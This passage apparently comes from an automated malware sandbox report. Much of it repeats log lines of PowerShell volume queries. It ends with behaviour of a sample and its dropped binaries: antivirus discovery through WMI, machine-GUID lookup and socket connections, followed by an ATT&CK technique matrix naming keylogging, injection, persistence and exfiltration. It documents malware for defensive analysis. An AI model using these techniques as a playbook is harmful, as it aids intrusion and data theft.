            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeQueries volume information: C:\ VolumeInformation
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeQueries volume information: \Device\CdRom0\ VolumeInformation
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeQueries volume information: C:\ VolumeInformation
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeQueries volume information: \Device\CdRom0\ VolumeInformation
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033AD280 GetLocalTime,51_2_033AD280
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D05CC GetVersionExA,GetVersionExA,51_2_033D05CC
            Source: C:\Users\user\Desktop\404.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: spkl.exe, 00000033.00000002.3231347372.00000000018C2000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000033.00000003.3167683213.00000000018EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_002452B0 setsockopt,_errno,_errno,_errno,strlen,memset,strncmp,strncmp,htons,WSAGetLastError,setsockopt,WSAIoctl,WSAGetLastError,strchr,htons,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,WSAGetLastError,connect,htons,atoi,65_2_002452B0
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information111
            Scripting
            Valid Accounts31
            Windows Management Instrumentation
            111
            Scripting
            1
            DLL Side-Loading
            111
            Disable or Modify Tools
            31
            Input Capture
            1
            System Time Discovery
            Remote Services11
            Archive Collected Data
            2
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            12
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            System Network Connections Discovery
            Remote Desktop Protocol31
            Input Capture
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            11
            Registry Run Keys / Startup Folder
            11
            Registry Run Keys / Startup Folder
            41
            Obfuscated Files or Information
            Security Account Manager4
            File and Directory Discovery
            SMB/Windows Admin Shares2
            Clipboard Data
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Software Packing
            NTDS57
            System Information Discovery
            Distributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets51
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials51
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading
            DCSync4
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Modify Registry
            Proc Filesystem1
            Application Window Discovery
